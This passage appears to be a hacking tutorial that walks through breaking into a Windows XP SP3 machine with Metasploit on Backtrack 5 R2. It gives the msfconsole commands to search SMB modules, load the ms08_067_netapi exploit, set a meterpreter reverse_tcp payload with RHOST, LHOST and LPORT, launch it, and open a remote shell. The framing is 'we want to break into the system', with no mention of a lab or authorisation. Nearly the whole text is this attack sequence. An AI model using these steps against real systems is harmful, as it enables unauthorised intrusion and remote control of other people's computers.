From the above we know that 3 ports are open by default on Microsoft Windows XP SP3. We want to break into the system (target OS) using Metasploit on Backtrack 5 R2.
We now run msfconsole:
1. Application > Backtrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole
OK, now we can look for any weaknesses in the SMB service. Just type:
msf > search smb
From the list, we want to use ms08_067_netapi; we can also get more information about that weakness.
To use it in Metasploit, just type:
msf > use exploit/windows/smb/ms08_067_netapi
After that, we can list the available payloads and select the one that will be used.
We will use windows/meterpreter/reverse_tcp. Then we must set several parameters with set PAYLOAD, set RHOST, set LHOST, and set LPORT.
To ensure that all parameters are correct, we can type the show options command.
Now we are going to launch the exploit.
Just type exploit.
Now, from meterpreter, we can type shell to get a shell on Windows XP.
Congratulations...! :)